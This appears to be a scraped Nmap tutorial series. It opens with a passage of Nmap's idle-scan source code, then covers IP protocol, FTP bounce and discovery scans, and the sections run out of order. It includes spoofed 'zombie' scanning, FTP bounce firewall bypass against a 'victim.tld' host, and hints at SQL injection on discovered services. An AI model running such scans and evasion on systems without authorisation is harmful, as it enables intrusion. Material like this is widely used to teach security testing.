o.ipoptionslen, o.magic_port + probes_sent + 1, proxy->probe_port, sequence_base + probes_sent + 1, ack, 0, TH_SYN|TH_ACK, 0, 0, (u8 *) "x02x04x05xb4",4, NULL, 0); gettimeofday(&probe_send_times[probes_sent], NULL); probes_sent++; /* Time to collect any replies */ while(probes_returned < probes_sent && !timedout) { to_usec = (probes_sent == NUM_IPID_PROBES)? hardtimeout : 1000; ip = (struct ip *) readipv4_pcap(proxy->pd, &bytes, to_usec, &rcvdtime, NULL, true); gettimeofday(&tmptv, NULL); if (!ip) { if (probes_sent < NUM_IPID_PROBES) break; if (TIMEVAL_SUBTRACT(tmptv, probe_send_times[probes_sent - 1]) >= hardtimeout) { timedout = 1; } continue; } else if (TIMEVAL_SUBTRACT(tmptv, probe_send_times[probes_sent - 1]) >= hardtimeout) { timedout = 1; } if (lastipid != 0 && ip->ip_id == lastipid) { continue; /* probably a duplicate */ } lastipid = ip->ip_id; if (bytes < ( 4 * ip->ip_hl) + 14U) continue; if (ip->ip_p == IPPROTO_TCP) { tcp = ((struct tcp_hdr *) (((char *) ip) + 4 * ip->ip_hl)); if (ntohs(tcp->th_dport) < (o.magic_port+1) || ntohs(tcp->th_dport) - o.magic_port > NUM_IPID_PROBES || ntohs(tcp->th_sport) != proxy->probe_port || ((tcp->th_flags & TH_RST) == 0)) { if (o.debugging > 1) error("Received unexpected response packet from %s during initial IP ID zombie testing", inet_ntoa(ip->ip_src)); continue; } seq_response_num = probes_returned; /* The stuff below only works when we send SYN packets instead of SYN|ACK, but then are slightly less stealthy and have less chance of sneaking through the firewall. Plus SYN|ACK is what they will be receiving back from the target */ probes_returned++; ipids[seq_response_num] = (u16) ntohs(ip->ip_id); probe_returned[seq_response_num] = 1; adjust_timeouts2(&probe_send_times[seq_response_num], &rcvdtime, &(proxy->host.to)); } } } /* Yeah! We're done sending/receiving probes ... now lets ensure all of our responses are adjacent in the array */ for(i=0,probes_returned=0; i < NUM_IPID_PROBES; i++) { if (probe_returned[i]) { if (i > probes_returned) ipids[probes_returned] = ipids[i]; probes_returned++; } } if (probes_returned == 0) fatal("Idle scan zombie %s (%s) port %hu cannot be used because it has not returned any of our probes -- perhaps it is down or firewalled.", proxy->host.HostName(), proxy->host.targetipstr(), proxy->probe_port); proxy->seqclass = get_ipid_sequence(probes_returned, ipids, 0); switch(proxy->seqclass) { case IPID_SEQ_INCR: case IPID_SEQ_BROKEN_INCR: log_write(LOG_PLAIN, "Idle scan using zombie %s (%s:%hu); Class: %sn", proxy->host.HostName(), proxy->host.targetipstr(), proxy->probe_port, ipidclass2ascii(proxy->seqclass)); break; default: fatal("Idle scan zombie %s (%s) port %hu cannot be used because IP ID sequencability class is: %s. Try another proxy.", proxy->host.HostName(), proxy->host.targetipstr(), proxy->probe_port, ipidclass2ascii(proxy->seqclass)); } proxy->latestid = ipids[probes_returned - 1]; proxy->current_groupsz = MIN(proxy->max_groupsz, 30); if (probes_returned < NUM_IPID_PROBES) { /* Yikes! We're already losing packets ... clamp down a bit ... */ if (o.debugging) error("Idle scan initial zombie qualification test: %d probes sent, only %d returned", NUM_IPID_PROBES, probes_returned); proxy->current_groupsz = MIN(12, proxy->max_groupsz); proxy->current_groupsz = MAX(proxy->current_groupsz, proxy->min_groupsz); proxy->senddelay += 5000; } /* OK, through experimentation I have found that some hosts (*cough* Solaris) APPEAR to use simple IP ID incrementing, but in reality they assign a new IP ID base to each host which connects with them. This is actually a good idea on several fronts, but it totally frustrates our efforts (which rely on side-channel IP ID info leaking to different hosts). The good news is that we can easily detect the problem by sending some spoofed packets "from" the first target to the zombie and then probing to verify that the proxy IP ID changed. This will also catch the case where the Nmap user is behind an egress filter or other measure that prevents this sort of sp00fery */ if (first_target) { for (probes_sent = 0; probes_sent < 4; probes_sent++) { if (probes_sent) usleep(50000); send_tcp_raw(proxy->rawsd, proxy->ethptr, first_target, proxy->host.v4hostip(), o.ttl, false, o.ipoptions, o.ipoptionslen, o.magic_port, proxy->probe_port, sequence_base + probes_sent + 1, ack, 0, TH_SYN|TH_ACK, 0, 0, (u8 *) "x02x04x05xb4", 4, NULL, 0); } /* Sleep a little while to give packets time to reach their destination */ usleep(300000); newipid = ipid_proxy_probe(proxy, NULL, NULL); if (newipid == -1) newipid = ipid_proxy_probe(proxy, NULL, NULL); /* OK, we'll give it one more try */ if (newipid < 0) fatal("Your IP ID Zombie (%s; %s) is behaving strangely -- suddenly cannot obtain IP ID", proxy->host.HostName(), proxy->host.targetipstr()); distance = ipid_distance(proxy->seqclass, proxy->latestid, newipid); if (distance <= 0) { fatal("Your IP ID Zombie (%s; %s) is behaving strangely -- suddenly cannot obtain valid IP ID distance.", proxy->host.HostName(), proxy->host.targetipstr()); } else if (distance == 1) { fatal("Even though your Zombie (%s; %s) appears to be vulnerable to IP ID sequence prediction (class: %s), our attempts have failed. This generally means that either the zombie uses a separate IP ID base for each host (like Solaris), or because you cannot spoof IP packets (perhaps your ISP has enabled egress filtering to prevent IP spoofing), or maybe the target network recognizes the packet source as bogus and drops them", proxy->host.HostName(), proxy->host.targetipstr(), ipidclass2ascii(proxy->seqclass)); } if (o.debugging && distance != 5) { error("WARNING: IP ID spoofing test sent 4 packets and expected a distance of 5, but instead got %d", distance); } proxy->latestid = newipid; } } /* Adjust timing parameters up or down given that an idle scan found a count of 'testcount' while the 'realcount' is as given. If the testcount was correct, timing is made more aggressive, while it is slowed down in the case of an error */ static void adjust_idle_timing(struct idle_proxy_info *proxy, Target *target, int testcount, int realcount) { static int notidlewarning = 0; if (o.debugging > 1) log_write(LOG_STDOUT, "%s: tested/true %d/%d -- old grpsz/delay: %f/%d ", __func__, testcount, realcount, proxy->current_groupsz, proxy->senddelay); else if (o.debugging && testcount != realcount) { error("%s: testcount: %d realcount: %d -- old grpsz/delay: %f/%d", __func__, testcount, realcount, proxy->current_groupsz, proxy->senddelay); } if (testcount < realcount) { /* We must have missed a port -- our probe could have been dropped, the response to proxy could have been dropped, or we didn't wait long enough before probing the proxy IP ID. The third case is covered elsewhere in the scan, so we worry most about the first two. The solution is to decrease our group size and add a sending delay */ /* packets could be dropped because too many were sent at once */ proxy->current_groupsz = MAX(proxy->min_groupsz, proxy->current_groupsz * 0.8); proxy->senddelay += 10000; proxy->senddelay = MIN(proxy->max_senddelay, proxy->senddelay); /* No group size should be greater than .5s of send delays */ proxy->current_groupsz = MAX(proxy->min_groupsz, MIN(proxy->current_groupsz, 500000 / (proxy->senddelay + 1))); } else if (testcount > realcount) { /* Perhaps the proxy host is not really idle ... */ /* I guess all I can do is decrease the group size, so that if the proxy is not really idle, at least we may be able to scan chunks more quickly in between outside packets */ proxy->current_groupsz = MAX(proxy->min_groupsz, proxy->current_groupsz * 0.8); if (!notidlewarning && o.verbose) { notidlewarning = 1; error("WARNING: idle scan has erroneously detected phantom ports -- is the proxy %s (%s) really idle?", proxy->host.HostName(), proxy->host.targetipstr()); } } else { /* W00p We got a perfect match. That means we get a slight increase in allowed group size and we can lightly decrease the senddelay */ proxy->senddelay = (int) (proxy->senddelay * 0.9); if (proxy->senddelay < 500) proxy->senddelay = 0; proxy->current_groupsz = MIN(proxy->current_groupsz * 1.1, 500000 / (proxy->senddelay + 1)); proxy->current_groupsz = MIN(proxy->max_groupsz, proxy->current_groupsz); } if (o.debugging > 1) log_write(LOG_STDOUT, "-> %f/%dn", proxy->current_groupsz, proxy->senddelay); } /* OK, now this is the hardcore idle scan function which actually does the testing (most of the other cruft in this file is just coordination, preparation, etc). This function simply uses the idle scan technique to try and count the number of open ports in the given port array. The sent_time and rcv_time are filled in with the times that the probe packet & response were sent/received. They can be NULL if you don't want to use them. The purpose is for timing adjustments if the numbers turn out to be accurate. */ static int idlescan_countopen2(struct idle_proxy_info *proxy, Target *target, u16 *ports, int numports, struct timeval *sent_time, struct timeval *rcv_time) { #if 0 /* Testing code */ int i; for(i=0; i < numports; i++) if (ports[i] == 22) return 1; return 0; #endif int openports; int tries; int proxyprobes_sent = 0; /* diff. from tries 'cause sometimes we skip tries */ int proxyprobes_rcvd = 0; /* To determine if packets were dr0pped */ int sent, rcvd; int ipid_dist; struct timeval start, end, latestchange, now; struct timeval probe_times[4]; int pr0be; static u32 seq = 0; int newipid = 0; int sleeptime; int lasttry = 0; int dotry3 = 0; struct eth_nfo eth; if (seq == 0) seq = get_random_u32(); memset(&end, 0, sizeof(end)); memset(&latestchange, 0, sizeof(latestchange)); gettimeofday(&start, NULL); if (sent_time) memset(sent_time, 0, sizeof(*sent_time)); if (rcv_time) memset(rcv_time, 0, sizeof(*rcv_time)); if (proxy->rawsd < 0) { if (!setTargetNextHopMAC(target)) fatal("%s: Failed to determine dst MAC address for Idle proxy", __func__); memcpy(eth.srcmac, target->SrcMACAddress(), 6); memcpy(eth.dstmac, target->NextHopMACAddress(), 6); eth.ethsd = eth_open_cached(target->deviceName()); if (eth.ethsd == NULL) fatal("%s: Failed to open ethernet device (%s)", __func__, target->deviceName()); } else eth.ethsd = NULL; /* I start by sending out the SYN pr0bez */ for(pr0be = 0; pr0be < numports; pr0be++) { if (o.scan_delay) enforce_scan_delay(NULL); else if (proxy->senddelay && pr0be > 0) usleep(proxy->senddelay); /* Maybe I should involve decoys in the picture at some point -- but doing it the straightforward way (using the same decoys as we use in probing the proxy box is risky. I'll have to think about this more. */ send_tcp_raw(proxy->rawsd, eth.ethsd? ð : NULL, proxy->host.v4hostip(), target->v4hostip(), o.ttl, false, o.ipoptions, o.ipoptionslen, proxy->probe_port, ports[pr0be], seq, 0, 0, TH_SYN, 0, 0, (u8 *) "x02x04x05xb4", 4, o.extra_payload, o.extra_payload_length); } gettimeofday(&end, NULL); openports = -1; tries = 0; TIMEVAL_MSEC_ADD(probe_times[0], start, MAX(50, (target->to.srtt * 3/4) / 1000)); TIMEVAL_MSEC_ADD(probe_times[1], start, target->to.srtt / 1000 ); TIMEVAL_MSEC_ADD(probe_times[2], end, MAX(75, (2 * target->to.srtt + target->to.rttvar) / 1000)); TIMEVAL_MSEC_ADD(probe_times[3], end, MIN(4000, (2 * target->to.srtt + (target->to.rttvar << 2 )) / 1000)); do { if (tries == 2) dotry3 = (get_random_u8() > 200); if (tries == 3 && !dotry3) break; /* We usually want to skip the long-wait test */ if (tries == 3 || (tries == 2 && !dotry3)) lasttry = 1; gettimeofday(&now, NULL); sleeptime = TIMEVAL_SUBTRACT(probe_times[tries], now); if (!lasttry && proxyprobes_sent > 0 && sleeptime < 50000) continue; /* No point going again so soon */ if (tries == 0 && sleeptime < 500) sleeptime = 500; if (o.debugging > 1) error("In preparation for idle scan probe try #%d, sleeping for %d usecs", tries, sleeptime); if (sleeptime > 0) usleep(sleeptime); newipid = ipid_proxy_probe(proxy, &sent, &rcvd); proxyprobes_sent += sent; proxyprobes_rcvd += rcvd; if (newipid > 0) { ipid_dist = ipid_distance(proxy->seqclass, proxy->latestid, newipid); /* I used to only do this if ipid_sit >= proxyprobes_sent, but I'd rather have a negative number in that case. */ if (ipid_dist < proxyprobes_sent) { if (o.debugging) error("%s: Must have lost a sent packet because ipid_dist is %d while proxyprobes_sent is %d.", __func__, ipid_dist, proxyprobes_sent); /* I no longer whack timing here ... done at bottom. */ } ipid_dist -= proxyprobes_sent; if (ipid_dist > openports) { openports = ipid_dist; gettimeofday(&latestchange, NULL); } else if (ipid_dist < openports && ipid_dist >= 0) { /* Uh-oh. Perhaps I dropped a packet this time */ if (o.debugging > 1) { error("%s: Counted %d open ports in try #%d, but counted %d earlier ... probably a proxy_probe problem", __func__, ipid_dist, tries, openports); } /* I no longer whack timing here ... done at bottom. */ } } if (openports > numports || (numports <= 2 && (openports == numports))) break; } while(tries++ < 3); if (proxyprobes_sent > proxyprobes_rcvd) { /* Uh-oh. It looks like we lost at least one proxy probe packet */ if (o.debugging) { error("%s: Sent %d probes; only %d responses. Slowing scan.", __func__, proxyprobes_sent, proxyprobes_rcvd); } proxy->senddelay += 5000; proxy->senddelay = MIN(proxy->max_senddelay, proxy->senddelay); /* No group size should be greater than .5s of send delays */ proxy->current_groupsz = MAX(proxy->min_groupsz, MIN(proxy->current_groupsz, 500000 / (proxy->senddelay+1))); } else { /* Yeah, we got as many responses as we sent probes. This calls for a very light timing acceleration ... */ proxy->senddelay = (int) (proxy->senddelay * 0.95); if (proxy->senddelay < 500) proxy->senddelay = 0; proxy->current_groupsz = MAX(proxy->min_groupsz, MIN(proxy->current_groupsz, 500000 / (proxy->senddelay+1))); } if ((openports > 0) && (openports <= numports)) { /* Yeah, we found open ports... lets adjust the timing ... */ if (o.debugging > 2) error("%s: found %d open ports (out of %d) in %lu usecs", __func__, openports, numports, (unsigned long) TIMEVAL_SUBTRACT(latestchange, start)); if (sent_time) *sent_time = start; if (rcv_time) *rcv_time = latestchange; } if (newipid > 0) proxy->latestid = newipid; if (eth.ethsd) { eth.ethsd = NULL; } /* don't need to close it due to caching */ return openports; } /* The job of this function is to use the idle scan technique to count the number of open ports in the given list. Under the covers, this function just farms out the hard work to another function. */ static int idlescan_countopen(struct idle_proxy_info *proxy, Target *target, u16 *ports, int numports, struct timeval *sent_time, struct timeval *rcv_time) { int tries = 0; int openports; do { openports = idlescan_countopen2(proxy, target, ports, numports, sent_time, rcv_time); tries++; if (tries == 6 || (openports >= 0 && openports <= numports)) break; if (o.debugging) { error("%s: In try #%d, counted %d open ports out of %d. Retrying", __func__, tries, openports, numports); } /* Sleep for a little while -- maybe proxy host had brief birst of traffic or similar problem */ sleep(tries * tries); if (tries == 5) sleep(45); /* We're gonna give up if this fails, so we will be a bit patient */ /* Since the host may have received packets while we were sleeping, lets update our proxy IP ID counter */ proxy->latestid = ipid_proxy_probe(proxy, NULL, NULL); } while(1); if (openports < 0 || openports > numports ) { /* Oh f*ck!!!! */ fatal("Idle scan is unable to obtain meaningful results from proxy %s (%s). I'm sorry it didn't work out.", proxy->host.HostName(), proxy->host.targetipstr()); } if (o.debugging > 2) error("%s: %d ports found open out of %d, starting with %hu", __func__, openports, numports, ports[0]); return openports; } /* Recursively idle scans scans a group of ports using a depth-first divide-and-conquer strategy to find the open one(s). */ static int idle_treescan(struct idle_proxy_info *proxy, Target *target, u16 *ports, int numports, int expectedopen) { int firstHalfSz = (numports + 1)/2; int secondHalfSz = numports - firstHalfSz; int flatcount1, flatcount2; int deepcount1 = -1, deepcount2 = -1; struct timeval sentTime1, rcvTime1, sentTime2, rcvTime2; int retrycount = -1, retry2 = -1; int totalfound = 0; /* Scan the first half of the range */ if (o.debugging > 1) { error("%s: Called against %s with %d ports, starting with %hu. expectedopen: %d", __func__, target->targetipstr(), numports, ports[0], expectedopen); error("IDLE SCAN TIMING: grpsz: %.3f delay: %d srtt: %d rttvar: %d", proxy->current_groupsz, proxy->senddelay, target->to.srtt, target->to.rttvar); } flatcount1 = idlescan_countopen(proxy, target, ports, firstHalfSz, &sentTime1, &rcvTime1); if (firstHalfSz > 1 && flatcount1 > 0) { /* A port appears open! We dig down deeper to find it ... */ deepcount1 = idle_treescan(proxy, target, ports, firstHalfSz, flatcount1); /* Now we assume deepcount1 is right, and adjust timing if flatcount1 was wrong. */ adjust_idle_timing(proxy, target, flatcount1, deepcount1); } /* I guess we had better do the second half too ... */ flatcount2 = idlescan_countopen(proxy, target, ports + firstHalfSz, secondHalfSz, &sentTime2, &rcvTime2); if ((secondHalfSz) > 1 && flatcount2 > 0) { /* A port appears open! We dig down deeper to find it ... */ deepcount2 = idle_treescan(proxy, target, ports + firstHalfSz, secondHalfSz, flatcount2); /* Now we assume deepcount1 is right, and adjust timing if flatcount1 was wrong */ adjust_idle_timing(proxy, target, flatcount2, deepcount2); } totalfound = (deepcount1 == -1)? flatcount1 : deepcount1; totalfound += (deepcount2 == -1)? flatcount2 : deepcount2; if ((flatcount1 + flatcount2 == totalfound) && (expectedopen == totalfound || expectedopen == -1)) { if (flatcount1 > 0) { if (o.debugging > 1) { error("Adjusting timing -- idlescan_countopen correctly found %d open ports (out of %d, starting with %hu)", flatcount1, firstHalfSz, ports[0]); } adjust_timeouts2(&sentTime1, &rcvTime1, &(target->to)); } if (flatcount2 > 0) { if (o.debugging > 2) { error("Adjusting timing -- idlescan_countopen correctly found %d open ports (out of %d, starting with %hu)", flatcount2, secondHalfSz, ports[firstHalfSz]); } adjust_timeouts2(&sentTime2, &rcvTime2, &(target->to)); } } if (totalfound != expectedopen) { if (deepcount1 == -1) { retrycount = idlescan_countopen(proxy, target, ports, firstHalfSz, NULL, NULL); if (retrycount != flatcount1) { /* We have to do a deep count if new ports were found and there are more than 1 total */ if (firstHalfSz > 1 && retrycount > 0) { retry2 = retrycount; retrycount = idle_treescan(proxy, target, ports, firstHalfSz, retrycount); adjust_idle_timing(proxy, target, retry2, retrycount); } else { if (o.debugging) error("Adjusting timing because my first scan of %d ports, starting with %hu found %d open, while second scan yielded %d", firstHalfSz, ports[0], flatcount1, retrycount); adjust_idle_timing(proxy, target, flatcount1, retrycount); } totalfound += retrycount - flatcount1; flatcount1 = retrycount; /* If our first count erroneously found and added an open port, we must delete it */ if (firstHalfSz == 1 && flatcount1 == 1 && retrycount == 0) target->ports.forgetPort(ports[0], IPPROTO_TCP); } } if (deepcount2 == -1) { retrycount = idlescan_countopen(proxy, target, ports + firstHalfSz, secondHalfSz, NULL, NULL); if (retrycount != flatcount2) { if (secondHalfSz > 1 && retrycount > 0) { retry2 = retrycount; retrycount = idle_treescan(proxy, target, ports + firstHalfSz, secondHalfSz, retrycount); adjust_idle_timing(proxy, target, retry2, retrycount); } else { if (o.debugging) error("Adjusting timing because my first scan of %d ports, starting with %hu found %d open, while second scan yeilded %d", secondHalfSz, ports[firstHalfSz], flatcount2, retrycount); adjust_idle_timing(proxy, target, flatcount2, retrycount); } totalfound += retrycount - flatcount2; flatcount2 = retrycount; /* If our first count erroneously found and added an open port, we must delete it. */ if (secondHalfSz == 1 && flatcount2 == 1 && retrycount == 0) target->ports.forgetPort(ports[firstHalfSz], IPPROTO_TCP); } } } if (firstHalfSz == 1 && flatcount1 == 1) target->ports.setPortState(ports[0], IPPROTO_TCP, PORT_OPEN); if ((secondHalfSz == 1) && flatcount2 == 1) target->ports.setPortState(ports[firstHalfSz], IPPROTO_TCP, PORT_OPEN); return totalfound; } /* The very top-level idle scan function -- scans the given target host using the given proxy -- the proxy is cached so that you can keep calling this function with different targets. */ void idle_scan(Target *target, u16 *portarray, int numports, char *proxyName, const struct scan_lists * ports) { static char lastproxy[MAXHOSTNAMELEN + 1] = ""; /* The proxy used in any previous call */ static struct idle_proxy_info proxy; int groupsz; int portidx = 0; /* Used for splitting the port array into chunks */ int portsleft; char scanname[128]; Snprintf(scanname, sizeof(scanname), "idle scan against %s", target->NameIP()); ScanProgressMeter SPM(scanname); if (numports == 0) return; /* nothing to scan for */ if (!proxyName) fatal("idle scan requires a proxy host"); if (*lastproxy && strcmp(proxyName, lastproxy)) fatal("%s: You are not allowed to change proxies midstream. Sorry", __func__); assert(target); if (target->timedOut(NULL)) return; if (target->ifType() == devt_loopback) { log_write(LOG_STDOUT, "Skipping Idle Scan against %s -- you can't idle scan your own machine (localhost).n", target->NameIP()); return; } target->startTimeOutClock(NULL); /* If this is the first call, */ if (!*lastproxy) { initialize_idleproxy(&proxy, proxyName, target->v4hostip(), ports); strncpy(lastproxy, proxyName, sizeof(lastproxy)); } /* If we don't have timing infoz for the new target, we'll use values derived from the proxy */ if (target->to.srtt == -1 && target->to.rttvar == -1) { target->to.srtt = MAX(200000,2 * proxy.host.to.srtt); target->to.rttvar = MAX(10000, MIN(proxy.host.to.rttvar, 2000000)); target->to.timeout = target->to.srtt + (target->to.rttvar << 2); } else { target->to.srtt = MAX(target->to.srtt, proxy.host.to.srtt); target->to.rttvar = MAX(target->to.rttvar, proxy.host.to.rttvar); target->to.timeout = target->to.srtt + (target->to.rttvar << 2); } /* Now I guess it is time to let the scanning begin! Since idle scan is sort of tree structured (we scan a group and then divide it up and drill down in subscans of the group), we split the port space into smaller groups and then call a recursive divide-and-counquer function to find the open ports */ while(portidx < numports) { portsleft = numports - portidx; /* current_groupsz is doubled below because idle_subscan cuts in half */ groupsz = MIN(portsleft, (int) (proxy.current_groupsz * 2)); idle_treescan(&proxy, target, portarray + portidx, groupsz, -1); portidx += groupsz; } char additional_info[14]; Snprintf(additional_info, sizeof(additional_info), "%d ports", numports); SPM.endTask(NULL, additional_info); /* Now we go through the ports which were scanned but not determined to be open, and add them in the "closed|filtered" state */ for(portidx = 0; portidx < numports; portidx++) { if (target->ports.portIsDefault(portarray[portidx], IPPROTO_TCP)) { target->ports.setPortState(portarray[portidx], IPPROTO_TCP, PORT_CLOSEDFILTERED); target->ports.setStateReason(portarray[portidx], IPPROTO_TCP, ER_NOIPIDCHANGE, 0, NULL); } else target->ports.setStateReason(portarray[portidx], IPPROTO_TCP, ER_IPIDCHANGE, 0, NULL); } target->stopTimeOutClock(NULL); return; } As you can see, this is my screenshot of the C++ source file. Just compile it and run it to get the results. OK, let’s start with our original scan method. IP Protocol Scan IP protocol scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines. This isn’t technically a port scan, since it cycles through IP protocol numbers rather than TCP or UDP port numbers. Command: nmap –sO target FTP Bounce Scan This allows a user to connect to one FTP server, then ask that files be sent to a third-party server. Simply it asks the FTP server to send a file to each interesting port of a target host in turn. The error message will describe whether the port is open or not. This is a good way to bypass firewalls, because organizational FTP servers are often placed where they have more access to other internal hosts than any old Internet host would. It takes an argument of the form <username>:<password>@<server>:<port>. <Server> is the name or IP address of a vulnerable FTP server. Command: nmap –b ftp rely host. Also, this can be used for port bounce attack. nmap -T0 -b username:password@ftpserver.tld:21 victim.tld This uses the username “username”, the password “password”, the FTP server “ftpserver.tld” and port 21 on said server to scan victim.tld. If the FTP server supports anonymous logins, just forget about the username:password@ part and Nmap will assume it allows -anonymous. You may omit :21 if the FTP port is 21, however, some people configure FTP on weird ports as an attempt at “security”. Port Specification and Scan Order In addition to all of the scan methods discussed previously, Nmap offers options for specifying which ports are scanned and whether the scan order is randomized or sequential. By default, Nmap scans the most common 1,000 ports for each protocol. -p <port ranges> (Only scan specified ports) This option specifies which ports you want to scan and overrides the default. Individual port numbers are OK, as are ranges separated by a hyphen (e.g. 1-1023). The beginning and/or end values of a range may be omitted, causing Nmap to use 1 and 65535, respectively. So you can specify -p- to scan ports from 1 through 65535. Scanning port zero is allowed if you specify it explicitly. Nmap –p 1-1023 target When scanning a combination of protocols (e.g. TCP and UDP), you can specify a particular protocol by preceding the port numbers by T: for TCP, U: for UDP, S: for SCTP, or P: for IP Protocol. nmap -p U:53,111,137,T:21-25,80,139,8080 target -F (Fast (limited port) scan) Specifies that you wish to scan fewer ports than the default. Normally Nmap scans the most common 1,000 ports for each scanned protocol. With -F, this is reduced to 100. nmap –F target -r (Don’t randomize ports) By default, Nmap randomizes the scanned port order (except that certain commonly accessible ports are moved near the beginning for efficiency reasons). This randomization is normally desirable, but you can specify -r for sequential (sorted from lowest to highest) port scanning instead. nmap –r target So this is the end of this part of the series. In the next part, I will go through advanced firewall evasion and custom creation of exploits with Nmap. Warning: The above mentioned malicious attack conducted on the lab has been given prior permission by the owner of website or admin. The above is meant for only educational purposes. So do not use for any personal intent, as it is prone to cyber attack. References: dumbscan.txt moreipid.txt Idle scan - Wikipedia, the free encyclopedia Source
-
As always during reconnaissance, scanning is the initial stage for information gathering. What is Reconnaissance? Reconnaissance is to collect as much as information about a target network as possible. From a hacker’s perspective, the information gathered is very helpful to make an attack, so to block that type of malicious attempt, generally a penetration tester tries to find the information and to patch the vulnerabilities, if found. This is also called Footprinting. Usually by information gathering, someone can find the below information: E-mail Address Port no/Protocols OS details Services Running Traceroute information/DNS information Firewall Identification and evasion And many more… So for information gathering, scanning is the first part. For scanning, Nmap is a great tool for discovering Open ports, protocol numbers, OS details, firewall details, etc. Introduction To Nmap Nmap (Network Mapper) is an open-source tool that specializes in network exploration and security auditing, originally published by Gordon “Fyodor” Lyon. The official website is (Nmap - Free Security Scanner For Network Exploration & Security Audits.). Nmap is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. Installation Of Nmap Nmap has great support for different environments. Windows: Install from the official site Nmap - Free Security Scanner For Network Exploration & Security Audits. For Windows, both GUI and command line options are available. The GUI option for Nmap is Zenmap. Linux (Ubuntu and Debian): Fire the command in the Linux terminal: apt-get install nmap In the below image, I have already installed Nmap. For Red Hat and Fedora based systems: yum install nmap For Gentoo Linux based systems: emerge nmap Here, I will show everything in the Linux terminal. Nmap Scripting Engine The Nmap Scripting Engine (NSE) is one of Nmap’s most powerful and flexible features. It allows users to write (and share) simple scripts to automate a wide variety of networking tasks. Basically these scripts are written in Lua programming language. Generally Nmap’s script engine does lots of things, some of them are below: Network discovery This is Nmap’s bread and butter. Examples include looking up WhoIs data based on the target domain, querying ARIN, RIPE, or APNIC for the target IP to determine ownership, performing identd lookups on open ports, SNMP queries, and listing available NFS/SMB/RPC shares and services. Vulnerability detection When a new vulnerability is discovered, you often want to scan your networks quickly to identify vulnerable systems before the bad guys do. While Nmap isn’t a comprehensive vulnerability scanner, NSE is powerful enough to handle even demanding vulnerability checks. Many vulnerability detection scripts are already available, and they plan to distribute more as they are written. Backdoor detection Many attackers and some automated worms leave backdoors to enable later reentry. Some of these can be detected by Nmap’s regular expression-based version detection. Vulnerability exploitation As a general scripting language, NSE can even be used to exploit vulnerabilities rather than just find them. The capability to add custom exploit scripts may be valuable for some people (particularly penetration testers), though they aren’t planning to turn Nmap into an exploitation framework such as Metasploit. As you can see below, I have used (-sc) options (or –script), which is a default script scan for the target network. You can see we got ssh, rpcbind, netbios-sn but the ports are either filtered or closed, so we can say that may be there are some firewall which is blocking our request. Later we will discuss how to identify firewalls and try to evade them. Now I m going to run a ping scan with discovery mode on (script) so that it will try all possible methods for scanning, that way I will get more juicy information. As you can see in the image, it is trying all possible methods as per script rules. See the next image for more information. Can you see the interesting ports and protocols? You can see dns-bruteforce found that host contains some blog, cms, sql, log, mail, and many more. So here we can perform SQL injection, the blog may be WordPress, Joomla, etc., so we can attack for a known CMS vulnerability, and obviously the method will be black-box pentesting. In the upcoming chapter I will describe how to write your own Nmap script engine, and how to exploit them using Nmap. Basic Scanning Techniques So here I will show the basic techniques for scanning network/host. But before that, you should know some basic stuff regarding Nmap status after scanning. Port Status: After scanning, you may see some results with a port status like filtered, open, closed, etc. Let me explain this. Open: This indicates that an application is listening for connections on this port. Closed: This indicates that the probes were received but there is no application listening on this port. Filtered: This indicates that the probes were not received and the state could not be established. It also indicates that the probes are being dropped by some kind of filtering. Unfiltered: This indicates that the probes were received but a state could not be established. Open/Filtered: This indicates that the port was filtered or open but Nmap couldn’t establish the state. Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn’t establish the state. Let’s Scan Hosts Scan A Single Network Go to your Nmap (either Windows/Linux) and fire the command: nmap 192.168.1.1(or) host name. Scan Multiple Network/Targets In Nmap you can even scan multiple targets for host discovery/information gathering. Command: map host1 host2 host3 etc….It will work for the entire subnet as well as different IP addresses. You can also scan multiple website/domain names at a time with the same command. See the below picture. It will convert the domain name to its equivalent IP address and scan the targets. Scan a Range Of IP address Command:nmap 192.168.2.1-192.168.2.100 Nmap can also be used to scan an entire subnet using CIDR (Classless Inter-Domain Routing) notation. Usage syntax: nmap [Network/CIDR] Ex:nmap 192.168.2.1/24 Scan a list of targets If you have a large number of systems to scan, you can enter the IP address (or host names) in a text file and use that file as input for Nmap on the command line. syntax: nmap -iL [list.txt] Scan Random Targets The -iR parameter can be used to select random Internet hosts to scan. Nmap will randomly generate the specified number of targets and attempt to scan them. syntax: nmap -iR [number of host] It is not a good habit to do a random scan unless you have been given some project. The –exclude option is used with Nmap to exclude hosts from a scan. syntax: nmap [targets] –exclude [host(s)] ex:nmap 192.168.2.1/24 –exclude 192.168.2.10 Aggressive Scan The aggressive scan selects most commonly used options within Nmap to try to give a simple alternative to writing long strings. It will also work for traceroute, etc. Command:nmap –A host Discovery With Nmap Discovery with Nmap is very interesting and very helpful for penetration testers. During discovery one can learn about services, port numbers, firewall presence, protocol, operating system, etc. We will discuss one by one. Don’t Ping The -PN option instructs Nmap to skip the default discovery check and perform a complete port scan on the target. This is useful when scanning hosts that are protected by a firewall that blocks ping probes. Syntax:nmap –PN Target By specifying these options, Nmap will discover the open ports without ping, which is the unpingable system. Ping Only Scan The -Sp option is responsible for a ping only scan. It will be more useful when you have a group of IP addresses and you don’t know which one is reachable. By specifying a particular target, you can get even more information, like MAC address. Syntax:nmap –Sp target TCP Syn Scan Before we start, we must know the syn packet. Basically a syn packet is used to initiate the connection between the two hosts. The TCP SYN ping sends a SYN packet to the target system and listens for a response. This alternative discovery method is useful for systems that are configured to block standard ICMP pings. The -PS option performs a TCP SYN ping. Syntax:nmap –PS targets The default port is port80. You can also specify other ports like –PS22, 23, 25, 443. TCP Ack Ping Scan This type of scan will only scan of Acknowledgement(ACK) packet. The -PA performs a TCP ACK ping on the specified target. The -PA option causes Nmap to send TCP ACK packets to the specified hosts. Syntax:nmap –PA target This method attempts to discover hosts by responding to TCP connections that are nonexistent in an attempt to solicit a response from the target. Like other ping options, it is useful in situations where standard ICMP pings are blocked. UDP Ping scan The –PU scan only on udp ping scans on the target. This type of scan sends udp packets to get a response. Syntax:nmap –PU target You can also specify the port number for scanning, like –PU 22, 80, 25, etc. In the above picture, the target is my 